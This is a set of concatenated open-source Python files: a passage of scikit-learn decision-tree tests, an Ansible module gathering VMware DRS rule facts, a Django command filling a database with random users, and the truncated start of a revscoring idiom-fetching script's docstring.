# also load the iris dataset
# and randomly permute it
iris = datasets.load_iris()
rng = np.random.RandomState(1)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# also load the boston dataset
# and randomly permute it
boston = datasets.load_boston()
perm = rng.permutation(boston.target.size)
boston.data = boston.data[perm]
boston.target = boston.target[perm]
def test_classification_toy():
"""Check classification on a toy dataset."""
for name, Tree in CLF_TREES.items():
clf = Tree(random_state=0)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result,
"Failed with {0}".format(name))
clf = Tree(max_features=1, random_state=1)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result,
"Failed with {0}".format(name))
def test_weighted_classification_toy():
"""Check classification on a weighted toy dataset."""
for name, Tree in CLF_TREES.items():
clf = Tree(random_state=0)
clf.fit(X, y, sample_weight=np.ones(len(X)))
assert_array_equal(clf.predict(T), true_result,
"Failed with {0}".format(name))
clf.fit(X, y, sample_weight=np.ones(len(X)) * 0.5)
assert_array_equal(clf.predict(T), true_result,
"Failed with {0}".format(name))
def test_regression_toy():
"""Check regression on a toy dataset."""
for name, Tree in REG_TREES.items():
reg = Tree(random_state=1)
reg.fit(X, y)
assert_almost_equal(reg.predict(T), true_result,
err_msg="Failed with {0}".format(name))
clf = Tree(max_features=1, random_state=1)
clf.fit(X, y)
assert_almost_equal(reg.predict(T), true_result,
err_msg="Failed with {0}".format(name))
def test_xor():
"""Check on a XOR problem"""
y = np.zeros((10, 10))
y[:5, :5] = 1
y[5:, 5:] = 1
gridx, gridy = np.indices(y.shape)
X = np.vstack([gridx.ravel(), gridy.ravel()]).T
y = y.ravel()
for name, Tree in CLF_TREES.items():
clf = Tree(random_state=0)
clf.fit(X, y)
assert_equal(clf.score(X, y), 1.0,
"Failed with {0}".format(name))
clf = Tree(random_state=0, max_features=1)
clf.fit(X, y)
assert_equal(clf.score(X, y), 1.0,
"Failed with {0}".format(name))
def test_iris():
"""Check consistency on dataset iris."""
for (name, Tree), criterion in product(CLF_TREES.items(), CLF_CRITERIONS):
clf = Tree(criterion=criterion, random_state=0)
clf.fit(iris.data, iris.target)
score = accuracy_score(clf.predict(iris.data), iris.target)
assert_greater(score, 0.9,
"Failed with {0}, criterion = {1} and score = {2}"
"".format(name, criterion, score))
clf = Tree(criterion=criterion, max_features=2, random_state=0)
clf.fit(iris.data, iris.target)
score = accuracy_score(clf.predict(iris.data), iris.target)
assert_greater(score, 0.5,
"Failed with {0}, criterion = {1} and score = {2}"
"".format(name, criterion, score))
def test_boston():
"""Check consistency on dataset boston house prices."""
for (name, Tree), criterion in product(REG_TREES.items(), REG_CRITERIONS):
reg = Tree(criterion=criterion, random_state=0)
reg.fit(boston.data, boston.target)
score = mean_squared_error(boston.target, reg.predict(boston.data))
assert_less(score, 1,
"Failed with {0}, criterion = {1} and score = {2}"
"".format(name, criterion, score))
# using fewer features reduces the learning ability of this tree,
# but reduces training time.
reg = Tree(criterion=criterion, max_features=6, random_state=0)
reg.fit(boston.data, boston.target)
score = mean_squared_error(boston.target, reg.predict(boston.data))
assert_less(score, 2,
"Failed with {0}, criterion = {1} and score = {2}"
"".format(name, criterion, score))
def test_probability():
"""Predict probabilities using DecisionTreeClassifier."""
for name, Tree in CLF_TREES.items():
clf = Tree(max_depth=1, max_features=1, random_state=42)
clf.fit(iris.data, iris.target)
prob_predict = clf.predict_proba(iris.data)
assert_array_almost_equal(np.sum(prob_predict, 1),
np.ones(iris.data.shape[0]),
err_msg="Failed with {0}".format(name))
assert_array_equal(np.argmax(prob_predict, 1),
clf.predict(iris.data),
err_msg="Failed with {0}".format(name))
assert_almost_equal(clf.predict_proba(iris.data),
np.exp(clf.predict_log_proba(iris.data)), 8,
err_msg="Failed with {0}".format(name))
def test_arrayrepr():
"""Check the array representation."""
# Check resize
X = np.arange(10000)[:, np.newaxis]
y = np.arange(10000)
for name, Tree in REG_TREES.items():
reg = Tree(max_depth=None, random_state=0)
reg.fit(X, y)
def test_pure_set():
"""Check when y is pure."""
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
y = [1, 1, 1, 1, 1, 1]
for name, TreeClassifier in CLF_TREES.items():
clf = TreeClassifier(random_state=0)
clf.fit(X, y)
assert_array_equal(clf.predict(X), y,
err_msg="Failed with {0}".format(name))
for name, TreeRegressor in REG_TREES.items():
reg = TreeRegressor(random_state=0)
reg.fit(X, y)
assert_almost_equal(clf.predict(X), y,
err_msg="Failed with {0}".format(name))
def test_numerical_stability():
"""Check numerical stability."""
X = np.array([
[152.08097839, 140.40744019, 129.75102234, 159.90493774],
[142.50700378, 135.81935120, 117.82884979, 162.75781250],
[127.28772736, 140.40744019, 129.75102234, 159.90493774],
[132.37025452, 143.71923828, 138.35694885, 157.84558105],
[103.10237122, 143.71928406, 138.35696411, 157.84559631],
[127.71276855, 143.71923828, 138.35694885, 157.84558105],
[120.91514587, 140.40744019, 129.75102234, 159.90493774]])
y = np.array(
[1., 0.70209277, 0.53896582, 0., 0.90914464, 0.48026916, 0.49622521])
with np.errstate(all="raise"):
for name, Tree in REG_TREES.items():
reg = Tree(random_state=0)
reg.fit(X, y)
reg.fit(X, -y)
reg.fit(-X, y)
reg.fit(-X, -y)
def test_importances():
"""Check variable importances."""
X, y = datasets.make_classification(n_samples=2000,
n_features=10,
n_informative=3,
n_redundant=0,
n_repeated=0,
shuffle=False,
random_state=0)
for name, Tree in CLF_TREES.items():
clf = Tree(random_state=0)
clf.fit(X, y)
importances = clf.feature_importances_
n_important = np.sum(importances > 0.1)
assert_equal(importances.shape[0], 10, "Failed with {0}".format(name))
assert_equal(n_important, 3, "Failed with {0}".format(name))
X_new = clf.transform(X, threshold="mean")
assert_less(0, X_new.shape[1], "Failed with {0}".format(name))
assert_less(X_new.shape[1], X.shape[1], "Failed with {0}".format(name))
# Check on iris that importances are the same for all builders
clf = DecisionTreeClassifier(random_state=0)
clf.fit(iris.data, iris.target)
clf2 = DecisionTreeClassifier(random_state=0,
max_leaf_nodes=len(iris.data))
clf2.fit(iris.data, iris.target)
assert_array_equal(clf.feature_importances_,
clf2.feature_importances_)
@raises(ValueError)
def test_importances_raises():
"""Check if variable importance before fit raises ValueError. """
clf = DecisionTreeClassifier()
clf.feature_importances_
def test_importances_gini_equal_mse():
"""Check that gini is equivalent to mse for binary output variable"""
X, y = datasets.make_classification(n_samples=2000,
n_features=10,
n_informative=3,
n_redundant=0,
n_repeated=0,
shuffle=False,
random_state=0)
# The gini index and the mean square error (variance) might differ due
# to numerical instability. Since those instabilities mainly occurs at
# high tree depth, we restrict this maximal depth.
clf = DecisionTreeClassifier(criterion="gini", max_depth=5,
random_state=0).fit(X, y)
reg = DecisionTreeRegressor(criterion="mse", max_depth=5,
random_state=0).fit(X, y)
assert_almost_equal(clf.feature_importances_, reg.feature_importances_)
assert_array_equal(clf.tree_.feature, reg.tree_.feature)
assert_array_equal(clf.tree_.children_left, reg.tree_.children_left)
assert_array_equal(clf.tree_.children_right, reg.tree_.children_right)
assert_array_equal(clf.tree_.n_node_samples, reg.tree_.n_node_samples)
def test_max_features():
"""Check max_features."""
for name, TreeRegressor in REG_TREES.items():
reg = TreeRegressor(max_features="auto")
reg.fit(boston.data, boston.target)
assert_equal(reg.max_features_, boston.data.shape[1])
for name, TreeClassifier in CLF_TREES.items():
clf = TreeClassifier(max_features="auto")
clf.fit(iris.data, iris.target)
assert_equal(clf.max_features_, 2)
for name, TreeEstimator in ALL_TREES.items():
est = TreeEstimator(max_features="sqrt")
est.fit(iris.data, iris.target)
assert_equal(est.max_features_,
int(np.sqrt(iris.data.shape[1])))
est = TreeEstimator(max_features="log2")
est.fit(iris.data, iris.target)
assert_equal(est.max_features_,
int(np.log2(iris.data.shape[1])))
est = TreeEstimator(max_features=1)
est.fit(iris.data, iris.target)
assert_equal(est.max_features_, 1)
est = TreeEstimator(max_features=3)
est.fit(iris.data, iris.target)
assert_equal(est.max_features_, 3)
est = TreeEstimator(max_features=0.01)
est.fit(iris.data, iris.target)
assert_equal(est.max_features_, 1)
est = TreeEstimator(max_features=0.5)
est.fit(iris.data, iris.target)
assert_equal(est.max_features_,
int(0.5 * iris.data.shape[1]))
est = TreeEstimator(max_features=1.0)
est.fit(iris.data, iris.target)
assert_equal(est.max_features_, iris.data.shape[1])
est = TreeEstimator(max_features=None)
est.fit(iris.data, iris.target)
assert_equal(est.max_features_, iris.data.shape[1])
# use values of max_features that are invalid
est = TreeEstimator(max_features=10)
assert_raises(ValueError, est.fit, X, y)
est = TreeEstimator(max_features=-1)
assert_raises(ValueError, est.fit, X, y)
est = TreeEstimator(max_features=0.0)
assert_raises(ValueError, est.fit, X, y)
est = TreeEstimator(max_features=1.5)
assert_raises(ValueError, est.fit, X, y)
est = TreeEstimator(max_features="foobar")
assert_raises(ValueError, est.fit, X, y)
def test_error():
"""Test that it gives proper exception on deficient input."""
for name, TreeEstimator in CLF_TREES.items():
# predict before fit
est = TreeEstimator()
assert_raises(Exception, est.predict_proba, X)
est.fit(X, y)
X2 = [-2, -1, 1] # wrong feature shape for sample
assert_raises(ValueError, est.predict_proba, X2)
for name, TreeEstimator in ALL_TREES.items():
# Invalid values for parameters
assert_raises(ValueError, TreeEstimator(min_samples_leaf=-1).fit, X, y)
assert_raises(ValueError,
TreeEstimator(min_weight_fraction_leaf=-1).fit,
X, y)
assert_raises(ValueError,
TreeEstimator(min_weight_fraction_leaf=0.51).fit,
X, y)
assert_raises(ValueError, TreeEstimator(min_samples_split=-1).fit,
X, y)
assert_raises(ValueError, TreeEstimator(max_depth=-1).fit, X, y)
assert_raises(ValueError, TreeEstimator(max_features=42).fit, X, y)
# Wrong dimensions
est = TreeEstimator()
y2 = y[:-1]
assert_raises(ValueError, est.fit, X, y2)
# Test with arrays that are non-contiguous.
Xf = np.asfortranarray(X)
est = TreeEstimator()
est.fit(Xf, y)
assert_almost_equal(est.predict(T), true_result)
# predict before fitting
est = TreeEstimator()
assert_raises(Exception, est.predict, T)
# predict on vector with different dims
est.fit(X, y)
t = np.asarray(T)
assert_raises(ValueError, est.predict, t[:, 1:])
# wrong sample shape
Xt = np.array(X).T
est = TreeEstimator()
est.fit(np.dot(X, Xt), y)
assert_raises(ValueError, est.predict, X)
clf = TreeEstimator()
clf.fit(X, y)
assert_raises(ValueError, clf.predict, Xt)
def test_min_samples_leaf():
"""Test if leaves contain more than leaf_count training examples"""
X = np.asfortranarray(iris.data.astype(tree._tree.DTYPE))
y = iris.target
# test both DepthFirstTreeBuilder and BestFirstTreeBuilder
# by setting max_leaf_nodes
for max_leaf_nodes in (None, 1000):
for name, TreeEstimator in ALL_TREES.items():
est = TreeEstimator(min_samples_leaf=5,
max_leaf_nodes=max_leaf_nodes,
random_state=0)
est.fit(X, y)
out = est.tree_.apply(X)
node_counts = np.bincount(out)
# drop inner nodes
leaf_count = node_counts[node_counts != 0]
assert_greater(np.min(leaf_count), 4,
"Failed with {0}".format(name))
def test_min_weight_fraction_leaf():
"""Test if leaves contain at least min_weight_fraction_leaf of the
training set"""
X = np.asfortranarray(iris.data.astype(tree._tree.DTYPE))
y = iris.target
rng = np.random.RandomState(0)
weights = rng.rand(X.shape[0])
total_weight = np.sum(weights)
# test both DepthFirstTreeBuilder and BestFirstTreeBuilder
# by setting max_leaf_nodes
for max_leaf_nodes, name, frac in product((None, 1000),
ALL_TREES,
np.linspace(0, 0.5, 6)):
TreeEstimator = ALL_TREES[name]
est = TreeEstimator(min_weight_fraction_leaf=frac,
max_leaf_nodes=max_leaf_nodes,
random_state=0)
est.fit(X, y, sample_weight=weights)
out = est.tree_.apply(X)
node_weights = np.bincount(out, weights=weights)
# drop inner nodes
leaf_weights = node_weights[node_weights != 0]
assert_greater_equal(
np.min(leaf_weights),
total_weight * est.min_weight_fraction_leaf,
"Failed with {0} "
"min_weight_fraction_leaf={1}".format(
name, est.min_weight_fraction_leaf))
def test_pickle():
"""Check that tree estimator are pickable """
for name, TreeClassifier in CLF_TREES.items():
clf = TreeClassifier(random_state=0)
clf.fit(iris.data, iris.target)
score = clf.score(iris.data, iris.target)
serialized_object = pickle.dumps(clf)
clf2 = pickle.loads(serialized_object)
assert_equal(type(clf2), clf.__class__)
score2 = clf2.score(iris.data, iris.target)
assert_equal(score, score2, "Failed to generate same score "
"after pickling (classification) "
"with {0}".format(name))
for name, TreeRegressor in REG_TREES.items():
reg = TreeRegressor(random_state=0)
reg.fit(boston.data, boston.target)
score = reg.score(boston.data, boston.target)
serialized_object = pickle.dumps(reg)
reg2 = pickle.loads(serialized_object)
assert_equal(type(reg2), reg.__class__)
score2 = reg2.score(boston.data, boston.target)
assert_equal(score, score2, "Failed to generate same score "
"after pickling (regression) "
"with {0}".format(name))
def test_multioutput():
"""Check estimators on multi-output problems."""
X = [[-2, -1],
[-1, -1],
[-1, -2],
[1, 1],
[1, 2],
[2, 1],
[-2, 1],
[-1, 1],
[-1, 2],
[2, -1],
[1, -1],
[1, -2]]
y = [[-1, 0],
[-1, 0],
[-1, 0],
[1, 1],
[1, 1],
[1, 1],
[-1, 2],
[-1, 2],
[-1, 2],
[1, 3],
[1, 3],
[1, 3]]
T = [[-1, -1], [1, 1], [-1, 1], [1, -1]]
y_true = [[-1, 0], [1, 1], [-1, 2], [1, 3]]
# toy classification problem
for name, TreeClassifier in CLF_TREES.items():
clf = TreeClassifier(random_state=0)
y_hat = clf.fit(X, y).predict(T)
assert_array_equal(y_hat, y_true)
assert_equal(y_hat.shape, (4, 2))
proba = clf.predict_proba(T)
assert_equal(len(proba), 2)
assert_equal(proba[0].shape, (4, 2))
assert_equal(proba[1].shape, (4, 4))
log_proba = clf.predict_log_proba(T)
assert_equal(len(log_proba), 2)
assert_equal(log_proba[0].shape, (4, 2))
assert_equal(log_proba[1].shape, (4, 4))
# toy regression problem
for name, TreeRegressor in REG_TREES.items():
reg = TreeRegressor(random_state=0)
y_hat = reg.fit(X, y).predict(T)
assert_almost_equal(y_hat, y_true)
assert_equal(y_hat.shape, (4, 2))
def test_classes_shape():
"""Test that n_classes_ and classes_ have proper shape."""
for name, TreeClassifier in CLF_TREES.items():
# Classification, single output
clf = TreeClassifier(random_state=0)
clf.fit(X, y)
assert_equal(clf.n_classes_, 2)
assert_array_equal(clf.classes_, [-1, 1])
# Classification, multi-output
_y = np.vstack((y, np.array(y) * 2)).T
clf = TreeClassifier(random_state=0)
clf.fit(X, _y)
assert_equal(len(clf.n_classes_), 2)
assert_equal(len(clf.classes_), 2)
assert_array_equal(clf.n_classes_, [2, 2])
assert_array_equal(clf.classes_, [[-1, 1], [-2, 2]])
def test_unbalanced_iris():
"""Check class rebalancing."""
unbalanced_X = iris.data[:125]
unbalanced_y = iris.target[:125]
sample_weight = _balance_weights(unbalanced_y)
for name, TreeClassifier in CLF_TREES.items():
clf = TreeClassifier(random_state=0)
clf.fit(unbalanced_X, unbalanced_y, sample_weight=sample_weight)
assert_almost_equal(clf.predict(unbalanced_X), unbalanced_y)
def test_memory_layout():
"""Check that it works no matter the memory layout"""
for (name, TreeEstimator), dtype in product(ALL_TREES.items(),
[np.float64, np.float32]):
est = TreeEstimator(random_state=0)
# Nothing
X = np.asarray(iris.data, dtype=dtype)
y = iris.target
assert_array_equal(est.fit(X, y).predict(X), y)
# C-order
X = np.asarray(iris.data, order="C", dtype=dtype)
y = iris.target
assert_array_equal(est.fit(X, y).predict(X), y)
# F-order
X = np.asarray(iris.data, order="F", dtype=dtype)
y = iris.target
assert_array_equal(est.fit(X, y).predict(X), y)
# Contiguous
X = np.ascontiguousarray(iris.data, dtype=dtype)
y = iris.target
assert_array_equal(est.fit(X, y).predict(X), y)
# Strided
X = np.asarray(iris.data[::3], dtype=dtype)
y = iris.target[::3]
assert_array_equal(est.fit(X, y).predict(X), y)
def test_sample_weight():
"""Check sample weighting."""
# Test that zero-weighted samples are not taken into account
X = np.arange(100)[:, np.newaxis]
y = np.ones(100)
y[:50] = 0.0
sample_weight = np.ones(100)
sample_weight[y == 0] = 0.0
clf = DecisionTreeClassifier(random_state=0)
clf.fit(X, y, sample_weight=sample_weight)
assert_array_equal(clf.predict(X), np.ones(100))
# Test that low weighted samples are not taken into account at low depth
X = np.arange(200)[:, np.newaxis]
y = np.zeros(200)
y[50:100] = 1
y[100:200] = 2
X[100:200, 0] = 200
sample_weight = np.ones(200)
sample_weight[y == 2] = .51 # Samples of class '2' are still weightier
clf = DecisionTreeClassifier(max_depth=1, random_state=0)
clf.fit(X, y, sample_weight=sample_weight)
assert_equal(clf.tree_.threshold[0], 149.5)
sample_weight[y == 2] = .5 # Samples of class '2' are no longer weightier
clf = DecisionTreeClassifier(max_depth=1, random_state=0)
clf.fit(X, y, sample_weight=sample_weight)
assert_equal(clf.tree_.threshold[0], 49.5) # Threshold should have moved
# Test that sample weighting is the same as having duplicates
X = iris.data
y = iris.target
duplicates = rng.randint(0, X.shape[0], 200)
clf = DecisionTreeClassifier(random_state=1)
clf.fit(X[duplicates], y[duplicates])
sample_weight = np.bincount(duplicates, minlength=X.shape[0])
clf2 = DecisionTreeClassifier(random_state=1)
clf2.fit(X, y, sample_weight=sample_weight)
internal = clf.tree_.children_left != tree._tree.TREE_LEAF
assert_array_almost_equal(clf.tree_.threshold[internal],
clf2.tree_.threshold[internal])
def test_sample_weight_invalid():
"""Check sample weighting raises errors."""
X = np.arange(100)[:, np.newaxis]
y = np.ones(100)
y[:50] = 0.0
clf = DecisionTreeClassifier(random_state=0)
sample_weight = np.random.rand(100, 1)
assert_raises(ValueError, clf.fit, X, y, sample_weight=sample_weight)
sample_weight = np.array(0)
assert_raises(ValueError, clf.fit, X, y, sample_weight=sample_weight)
sample_weight = np.ones(101)
assert_raises(ValueError, clf.fit, X, y, sample_weight=sample_weight)
sample_weight = np.ones(99)
assert_raises(ValueError, clf.fit, X, y, sample_weight=sample_weight)
def test_max_leaf_nodes():
"""Test greedy trees with max_depth + 1 leafs. """
from sklearn.tree._tree import TREE_LEAF
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
k = 4
for name, TreeEstimator in ALL_TREES.items():
est = TreeEstimator(max_depth=None, max_leaf_nodes=k + 1).fit(X, y)
tree = est.tree_
assert_equal((tree.children_left == TREE_LEAF).sum(), k + 1)
# max_leaf_nodes in (0, 1) should raise ValueError
est = TreeEstimator(max_depth=None, max_leaf_nodes=0)
assert_raises(ValueError, est.fit, X, y)
est = TreeEstimator(max_depth=None, max_leaf_nodes=1)
assert_raises(ValueError, est.fit, X, y)
est = TreeEstimator(max_depth=None, max_leaf_nodes=0.1)
assert_raises(ValueError, est.fit, X, y)
def test_max_leaf_nodes_max_depth():
"""Test preceedence of max_leaf_nodes over max_depth. """
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
k = 4
for name, TreeEstimator in ALL_TREES.items():
est = TreeEstimator(max_depth=1, max_leaf_nodes=k).fit(X, y)
tree = est.tree_
assert_greater(tree.max_depth, 1)
def test_arrays_persist():
"""Ensure property arrays' memory stays alive when tree disappears
non-regression for #2726
"""
for attr in ['n_classes', 'value', 'children_left', 'children_right',
'threshold', 'impurity', 'feature', 'n_node_samples']:
value = getattr(DecisionTreeClassifier().fit([[0]], [0]).tree_, attr)
# if pointing to freed memory, contents may be arbitrary
assert_true(-2 <= value.flat[0] < 2,
'Array points to arbitrary memory')
def test_only_constant_features():
random_state = check_random_state(0)
X = np.zeros((10, 20))
y = random_state.randint(0, 2, (10, ))
for name, TreeEstimator in ALL_TREES.items():
est = TreeEstimator(random_state=0)
est.fit(X, y)
assert_equal(est.tree_.max_depth, 0)
def test_with_only_one_non_constant_features():
X = np.hstack([np.array([[1.], [1.], [0.], [0.]]),
np.zeros((4, 1000))])
y = np.array([0., 1., 0., 1.0])
for name, TreeEstimator in CLF_TREES.items():
est = TreeEstimator(random_state=0, max_features=1)
est.fit(X, y)
assert_equal(est.tree_.max_depth, 1)
assert_array_equal(est.predict_proba(X), 0.5 * np.ones((4, 2)))
for name, TreeEstimator in REG_TREES.items():
est = TreeEstimator(random_state=0, max_features=1)
est.fit(X, y)
assert_equal(est.tree_.max_depth, 1)
assert_array_equal(est.predict(X), 0.5 * np.ones((4, )))
def test_big_input():
"""Test if the warning for too large inputs is appropriate."""
X = np.repeat(10 ** 40., 4).astype(np.float64).reshape(-1, 1)
clf = DecisionTreeClassifier()
try:
clf.fit(X, [0, 1, 0, 1])
except ValueError as e:
assert_in("float32", str(e))
def test_realloc():
from sklearn.tree._tree import _realloc_test
assert_raises(MemoryError, _realloc_test)
def test_huge_allocations():
n_bits = int(platform.architecture()[0].rstrip('bit'))
X = np.random.randn(10, 2)
y = np.random.randint(0, 2, 10)
# Sanity check: we cannot request more memory than the size of the address
# space. Currently raises OverflowError.
huge = 2 ** (n_bits + 1)
clf = DecisionTreeClassifier(splitter='best', max_leaf_nodes=huge)
assert_raises(Exception, clf.fit, X, y)
# Non-regression test: MemoryError used to be dropped by Cython
# because of missing "except *".
huge = 2 ** (n_bits - 1) - 1
clf = DecisionTreeClassifier(splitter='best', max_leaf_nodes=huge)
assert_raises(MemoryError, clf.fit, X, y)
| bsd-3-clause | -7,347,510,510,261,935,000 | 34.505481 | 79 | 0.589434 | false |
t794104/ansible | lib/ansible/modules/cloud/vmware/vmware_drs_rule_facts.py | 6 | 9472 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Abhijeet Kasurde <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: vmware_drs_rule_facts
short_description: Gathers facts about DRS rule on the given cluster
description:
- 'This module can be used to gather facts about DRS VM-VM and VM-HOST rules from the given cluster.'
version_added: '2.5'
author:
- Abhijeet Kasurde (@Akasurde)
notes:
- Tested on vSphere 6.5
requirements:
- python >= 2.6
- PyVmomi
options:
cluster_name:
description:
- Name of the cluster.
- DRS facts for the given cluster will be returned.
- This is required parameter if C(datacenter) parameter is not provided.
datacenter:
description:
- Name of the datacenter.
- DRS facts for all the clusters from the given datacenter will be returned.
- This is required parameter if C(cluster_name) parameter is not provided.
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- name: Gather DRS facts about given Cluster
vmware_drs_rule_facts:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
cluster_name: '{{ cluster_name }}'
delegate_to: localhost
register: cluster_drs_facts
- name: Gather DRS facts about all Clusters in given datacenter
vmware_drs_rule_facts:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
datacenter: '{{ datacenter_name }}'
delegate_to: localhost
register: datacenter_drs_facts
'''
RETURN = r'''
drs_rule_facts:
description: metadata about DRS rule from given cluster / datacenter
returned: always
type: dict
sample: {
"DC0_C0": [
{
"rule_affinity": false,
"rule_enabled": true,
"rule_key": 1,
"rule_mandatory": true,
"rule_name": "drs_rule_0001",
"rule_type": "vm_vm_rule",
"rule_uuid": "52be5061-665a-68dc-3d25-85cd2d37e114",
"rule_vms": [
"VM_65",
"VM_146"
]
},
],
"DC1_C1": [
{
"rule_affine_host_group_name": "host_group_1",
"rule_affine_hosts": [
"10.76.33.204"
],
"rule_anti_affine_host_group_name": null,
"rule_anti_affine_hosts": [],
"rule_enabled": true,
"rule_key": 1,
"rule_mandatory": false,
"rule_name": "vm_host_rule_0001",
"rule_type": "vm_host_rule",
"rule_uuid": "52687108-4d3a-76f2-d29c-b708c40dbe40",
"rule_vm_group_name": "test_vm_group_1",
"rule_vms": [
"VM_8916",
"VM_4010"
]
}
],
}
'''
try:
from pyVmomi import vim
except ImportError:
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import vmware_argument_spec, PyVmomi, find_datacenter_by_name, get_all_objs
class VmwareDrsFactManager(PyVmomi):
def __init__(self, module):
super(VmwareDrsFactManager, self).__init__(module)
datacenter_name = self.params.get('datacenter', None)
if datacenter_name:
datacenter_obj = find_datacenter_by_name(self.content, datacenter_name=datacenter_name)
self.cluster_obj_list = []
if datacenter_obj:
folder = datacenter_obj.hostFolder
self.cluster_obj_list = get_all_objs(self.content, [vim.ClusterComputeResource], folder)
else:
self.module.fail_json(changed=False, msg="Datacenter '%s' not found" % datacenter_name)
cluster_name = self.params.get('cluster_name', None)
if cluster_name:
cluster_obj = self.find_cluster_by_name(cluster_name=cluster_name)
if cluster_obj is None:
self.module.fail_json(changed=False, msg="Cluster '%s' not found" % cluster_name)
else:
self.cluster_obj_list = [cluster_obj]
def get_all_from_group(self, group_name=None, cluster_obj=None, hostgroup=False):
"""
Return all VM / Host names using given group name
Args:
group_name: Rule name
cluster_obj: Cluster managed object
hostgroup: True if we want only host name from group
Returns: List of VM / Host names belonging to given group object
"""
obj_name_list = []
if not all([group_name, cluster_obj]):
return obj_name_list
for group in cluster_obj.configurationEx.group:
if group.name == group_name:
if not hostgroup and isinstance(group, vim.cluster.VmGroup):
obj_name_list = [vm.name for vm in group.vm]
break
elif hostgroup and isinstance(group, vim.cluster.HostGroup):
obj_name_list = [host.name for host in group.host]
break
return obj_name_list
@staticmethod
def normalize_vm_vm_rule_spec(rule_obj=None):
"""
Return human readable rule spec
Args:
rule_obj: Rule managed object
Returns: Dictionary with DRS VM VM Rule info
"""
if rule_obj is None:
return {}
return dict(rule_key=rule_obj.key,
rule_enabled=rule_obj.enabled,
rule_name=rule_obj.name,
rule_mandatory=rule_obj.mandatory,
rule_uuid=rule_obj.ruleUuid,
rule_vms=[vm.name for vm in rule_obj.vm],
rule_type="vm_vm_rule",
rule_affinity=True if isinstance(rule_obj, vim.cluster.AffinityRuleSpec) else False,
)
def normalize_vm_host_rule_spec(self, rule_obj=None, cluster_obj=None):
"""
Return human readable rule spec
Args:
rule_obj: Rule managed object
cluster_obj: Cluster managed object
Returns: Dictionary with DRS VM HOST Rule info
"""
if not all([rule_obj, cluster_obj]):
return {}
return dict(rule_key=rule_obj.key,
rule_enabled=rule_obj.enabled,
rule_name=rule_obj.name,
rule_mandatory=rule_obj.mandatory,
rule_uuid=rule_obj.ruleUuid,
rule_vm_group_name=rule_obj.vmGroupName,
rule_affine_host_group_name=rule_obj.affineHostGroupName,
rule_anti_affine_host_group_name=rule_obj.antiAffineHostGroupName,
rule_vms=self.get_all_from_group(group_name=rule_obj.vmGroupName,
cluster_obj=cluster_obj),
rule_affine_hosts=self.get_all_from_group(group_name=rule_obj.affineHostGroupName,
cluster_obj=cluster_obj,
hostgroup=True),
rule_anti_affine_hosts=self.get_all_from_group(group_name=rule_obj.antiAffineHostGroupName,
cluster_obj=cluster_obj,
hostgroup=True),
rule_type="vm_host_rule",
)
def gather_drs_rule_facts(self):
"""
Gather DRS rule facts about given cluster
Returns: Dictionary of clusters with DRS facts
"""
cluster_rule_facts = dict()
for cluster_obj in self.cluster_obj_list:
cluster_rule_facts[cluster_obj.name] = []
for drs_rule in cluster_obj.configuration.rule:
if isinstance(drs_rule, vim.cluster.VmHostRuleInfo):
cluster_rule_facts[cluster_obj.name].append(self.normalize_vm_host_rule_spec(rule_obj=drs_rule,
cluster_obj=cluster_obj))
else:
cluster_rule_facts[cluster_obj.name].append(self.normalize_vm_vm_rule_spec(rule_obj=drs_rule))
return cluster_rule_facts
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
datacenter=dict(type='str', required=False),
cluster_name=dict(type='str', required=False),
)
module = AnsibleModule(
argument_spec=argument_spec,
required_one_of=[
['cluster_name', 'datacenter'],
],
supports_check_mode=True,
)
vmware_drs_facts = VmwareDrsFactManager(module)
module.exit_json(changed=False, drs_rule_facts=vmware_drs_facts.gather_drs_rule_facts())
if __name__ == "__main__":
main()
| gpl-3.0 | -469,219,042,870,135,000 | 35.571429 | 122 | 0.546347 | false |
mesenev/movement_fefu | movement_app/management/commands/filldb.py | 2 | 2090 | import random
from django.core.management.base import BaseCommand
from movement_app.models import *
__author__ = 'komatsu'
def random_date(start, end):
"""
This function will return a random datetime between two datetime
objects.
"""
delta = end - start
int_delta = (delta.days * 24 * 60 * 60) + delta.seconds
random_second = random.randrange(int_delta)
return start + datetime.timedelta(seconds=random_second)
sirnames = open('movement_app/management/sirnames').read().split()
names = open('movement_app/management/names').read().split()
d2 = datetime.datetime.now() - datetime.timedelta(365)
def proper_v(int1, int2):
a, b = int1, int2
return a, b
class Command(BaseCommand):
help = 'Fill both users and userinfo dbs with records'
def handle(self, *args, **options):
for i in range(100):
a = random.choice(sirnames)
b = random.choice(names)
user = User(
password='111',
username=a + b + str(i),
first_name=b,
last_name=a,
is_staff=0
)
user.save()
a, b = proper_v(random.randrange(1, 5), random.randrange(1, 4))
user_from = random.choice(DORM_LIST)
user_to = list(DORM_LIST)
user_to.remove(user_from)
qwe = random.sample(set(user_to), random.randrange(1, 5))
qwe = [str(i) for i in qwe]
user_to = '|'.join(qwe)
time = random_date(d2, datetime.datetime.now())
userinfo = UserInfo(
userfield=user,
is_female=random.choice([False, True]),
now=a,
want=b,
misc='blablabla',
user_from=user_from,
user_to=user_to,
phone_number=random.randint(10000000000, 99999999999),
uptime=time,
is_active=True,
is_succeed=False
)
print(time)
userinfo.save()
print(i) | mit | 5,191,440,878,712,828,000 | 28.041667 | 75 | 0.536842 | false |
wiki-ai/revscoring | revscoring/utilities/fetch_idioms.py | 1 | 2320 | """
``revscoring fetch_idioms -h``
::
Gets a list of English language idioms from en.wiktionary.org.
Usage:
fetch_idioms [--output=<path>]
[--verbose] [--debug]
Options:
-h --help Print this documentation
--output=<path> Path to a file to write the idioms
[default: <stdout>]
